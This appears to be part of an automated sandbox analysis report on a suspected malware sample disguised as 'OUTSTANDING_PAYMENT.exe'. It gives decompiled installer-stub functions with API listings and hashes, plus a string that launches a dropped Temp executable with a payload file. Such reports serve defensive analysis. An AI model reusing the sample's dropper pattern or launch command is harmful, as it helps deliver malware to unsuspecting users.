				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                                                        0x00404795
                                                                                                                        0x004048c2
                                                                                                                        0x0040491f
                                                                                                                        0x00404923
                                                                                                                        0x004049f0
                                                                                                                        0x004049f2
                                                                                                                        0x004049f2
                                                                                                                        0x004049f8
                                                                                                                        0x004049f8
                                                                                                                        0x004049fb
                                                                                                                        0x00000000
                                                                                                                        0x00404a02
                                                                                                                        0x00404931
                                                                                                                        0x00404937
                                                                                                                        0x00404941
                                                                                                                        0x0040494c
                                                                                                                        0x0040494f
                                                                                                                        0x00404952
                                                                                                                        0x0040495d
                                                                                                                        0x00404960
                                                                                                                        0x00404967
                                                                                                                        0x00404974
                                                                                                                        0x00404985
                                                                                                                        0x0040498b
                                                                                                                        0x00404993
                                                                                                                        0x004049a1
                                                                                                                        0x004049a7
                                                                                                                        0x004049a7
                                                                                                                        0x00404967
                                                                                                                        0x004049b1
                                                                                                                        0x00000000
                                                                                                                        0x004049bc
                                                                                                                        0x004049c0
                                                                                                                        0x004049d0
                                                                                                                        0x004049d0
                                                                                                                        0x004049d6
                                                                                                                        0x004049e2
                                                                                                                        0x004049e2
                                                                                                                        0x00000000
                                                                                                                        0x004049e6
                                                                                                                        0x004049b1
                                                                                                                        0x004048cd
                                                                                                                        0x00000000
                                                                                                                        0x004048df
                                                                                                                        0x004048e4
                                                                                                                        0x004048ea
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404913
                                                                                                                        0x00404915
                                                                                                                        0x0040491a
                                                                                                                        0x00000000
                                                                                                                        0x0040491a
                                                                                                                        0x004048cd
                                                                                                                        0x0040479b
                                                                                                                        0x0040479e
                                                                                                                        0x004047a3
                                                                                                                        0x004047b4
                                                                                                                        0x004047b4
                                                                                                                        0x004047bc
                                                                                                                        0x004047bf
                                                                                                                        0x004047c3
                                                                                                                        0x004047c6
                                                                                                                        0x004047ca
                                                                                                                        0x004047cd
                                                                                                                        0x004047d0
                                                                                                                        0x004047d3
                                                                                                                        0x004047da
                                                                                                                        0x004047dc
                                                                                                                        0x004047dc
                                                                                                                        0x004047e6
                                                                                                                        0x004047f3
                                                                                                                        0x004047fd
                                                                                                                        0x00404802
                                                                                                                        0x00404805
                                                                                                                        0x0040480a
                                                                                                                        0x00404821
                                                                                                                        0x00404828
                                                                                                                        0x0040483b
                                                                                                                        0x0040483e
                                                                                                                        0x00404852
                                                                                                                        0x00404859
                                                                                                                        0x0040485e
                                                                                                                        0x00404863
                                                                                                                        0x00404863
                                                                                                                        0x00404871
                                                                                                                        0x0040487f
                                                                                                                        0x00404891
                                                                                                                        0x00404896
                                                                                                                        0x004048a6
                                                                                                                        0x004048a8
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                                        • GetDlgItem.USER32 ref: 00404835
                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                                        • GetSysColor.USER32(?), ref: 00404863
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                                        • GetDlgItem.USER32 ref: 004048FF
                                                                                                                        • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                                        • GetDlgItem.USER32 ref: 00404931
                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404985
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                                        • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z, xrefs: 00404960
                                                                                                                        • N, xrefs: 0040491F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$N
                                                                                                                        • API String ID: 3103080414-1504422677
                                                                                                                        • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                        • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                                        • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                        • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                        0x004062ae
                                                                                                                        0x004062b7
                                                                                                                        0x004062be
                                                                                                                        0x004062c8
                                                                                                                        0x004062dc
                                                                                                                        0x00406304
                                                                                                                        0x0040630b
                                                                                                                        0x0040630f
                                                                                                                        0x00406313
                                                                                                                        0x00406333
                                                                                                                        0x0040633a
                                                                                                                        0x00406344
                                                                                                                        0x00406351
                                                                                                                        0x00406356
                                                                                                                        0x0040635b
                                                                                                                        0x0040635f
                                                                                                                        0x0040636e
                                                                                                                        0x00406370
                                                                                                                        0x0040637d
                                                                                                                        0x00406381
                                                                                                                        0x0040641c
                                                                                                                        0x00000000
                                                                                                                        0x00406397
                                                                                                                        0x004063a4
                                                                                                                        0x004063c8
                                                                                                                        0x004063cc
                                                                                                                        0x004063eb
                                                                                                                        0x004063ef
                                                                                                                        0x004063ef
                                                                                                                        0x004063f1
                                                                                                                        0x004063fa
                                                                                                                        0x00406405
                                                                                                                        0x00406410
                                                                                                                        0x00406416
                                                                                                                        0x00000000
                                                                                                                        0x00406416
                                                                                                                        0x004063ce
                                                                                                                        0x004063d1
                                                                                                                        0x004063dc
                                                                                                                        0x004063d8
                                                                                                                        0x004063da
                                                                                                                        0x004063db
                                                                                                                        0x004063db
                                                                                                                        0x004063e3
                                                                                                                        0x004063e5
                                                                                                                        0x00000000
                                                                                                                        0x004063e5
                                                                                                                        0x004063af
                                                                                                                        0x004063b5
                                                                                                                        0x00000000
                                                                                                                        0x004063b5
                                                                                                                        0x00406381
                                                                                                                        0x0040635f
                                                                                                                        0x004062de
                                                                                                                        0x004062e9
                                                                                                                        0x004062f2
                                                                                                                        0x004062f6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004062f6
                                                                                                                        0x00406427

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                                        • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                                                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                          • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                        • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                                                        • wsprintfA.USER32 ref: 0040632D
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                                        • GlobalFree.KERNEL32 ref: 00406416
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,80000000,00000003), ref: 0040615C
                                                                                                                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                        • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                                        • API String ID: 2171350718-2295842750
                                                                                                                        • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                        • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                                        • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                        • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                        0x0040100a
                                                                                                                        0x00401039
                                                                                                                        0x00401047
                                                                                                                        0x0040104d
                                                                                                                        0x00401051
                                                                                                                        0x0040105b
                                                                                                                        0x00401061
                                                                                                                        0x00401064
                                                                                                                        0x004010f3
                                                                                                                        0x00401089
                                                                                                                        0x0040108c
                                                                                                                        0x004010a6
                                                                                                                        0x004010bd
                                                                                                                        0x004010cc
                                                                                                                        0x004010cf
                                                                                                                        0x004010d5
                                                                                                                        0x004010d9
                                                                                                                        0x004010e4
                                                                                                                        0x004010ed
                                                                                                                        0x004010ef
                                                                                                                        0x004010ef
                                                                                                                        0x00401100
                                                                                                                        0x00401105
                                                                                                                        0x0040110d
                                                                                                                        0x00401110
                                                                                                                        0x00401112
                                                                                                                        0x00401118
                                                                                                                        0x0040111f
                                                                                                                        0x00401126
                                                                                                                        0x00401130
                                                                                                                        0x00401142
                                                                                                                        0x00401156
                                                                                                                        0x00401160
                                                                                                                        0x00401165
                                                                                                                        0x00401165
                                                                                                                        0x00401110
                                                                                                                        0x0040116e
                                                                                                                        0x00000000
                                                                                                                        0x00401178
                                                                                                                        0x00401010
                                                                                                                        0x00401013
                                                                                                                        0x00401015
                                                                                                                        0x0040101f
                                                                                                                        0x0040101f
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                        • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                        • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                                        • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                        • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                                                        0x004066a5
                                                                                                                        0x004066a5
                                                                                                                        0x004066a5
                                                                                                                        0x004066ab
                                                                                                                        0x004066b0
                                                                                                                        0x004066c1
                                                                                                                        0x004066c1
                                                                                                                        0x004066c9
                                                                                                                        0x004066ca
                                                                                                                        0x004066cb
                                                                                                                        0x004066cc
                                                                                                                        0x004066cf
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066ea
                                                                                                                        0x004066ed
                                                                                                                        0x004066ed
                                                                                                                        0x004066f1
                                                                                                                        0x004066f7
                                                                                                                        0x004066fa
                                                                                                                        0x004068d5
                                                                                                                        0x004068d5
                                                                                                                        0x004068e0
                                                                                                                        0x004068ec
                                                                                                                        0x004068ec
                                                                                                                        0x00000000
                                                                                                                        0x00406700
                                                                                                                        0x00406705
                                                                                                                        0x0040671a
                                                                                                                        0x0040671b
                                                                                                                        0x00406721
                                                                                                                        0x004068b3
                                                                                                                        0x004068c1
                                                                                                                        0x004068c4
                                                                                                                        0x004068c4
                                                                                                                        0x004068b5
                                                                                                                        0x004068b8
                                                                                                                        0x004068bb
                                                                                                                        0x004068bd
                                                                                                                        0x004068bd
                                                                                                                        0x004068c6
                                                                                                                        0x004068c6
                                                                                                                        0x004068cc
                                                                                                                        0x004068cf
                                                                                                                        0x00406702
                                                                                                                        0x00000000
                                                                                                                        0x00406702
                                                                                                                        0x00000000
                                                                                                                        0x004068cf
                                                                                                                        0x00406727
                                                                                                                        0x0040672a
                                                                                                                        0x00406739
                                                                                                                        0x00406740
                                                                                                                        0x0040674c
                                                                                                                        0x0040674f
                                                                                                                        0x00406752
                                                                                                                        0x00406753
                                                                                                                        0x00406758
                                                                                                                        0x0040675e
                                                                                                                        0x00406761
                                                                                                                        0x00406764
                                                                                                                        0x00406857
                                                                                                                        0x0040685c
                                                                                                                        0x0040688f
                                                                                                                        0x00406894
                                                                                                                        0x00406899
                                                                                                                        0x0040689e
                                                                                                                        0x0040689e
                                                                                                                        0x004068a3
                                                                                                                        0x004068a9
                                                                                                                        0x004068ac
                                                                                                                        0x00000000
                                                                                                                        0x004068ac
                                                                                                                        0x0040685e
                                                                                                                        0x00406861
                                                                                                                        0x00406864
                                                                                                                        0x00406879
                                                                                                                        0x00406880
                                                                                                                        0x00406866
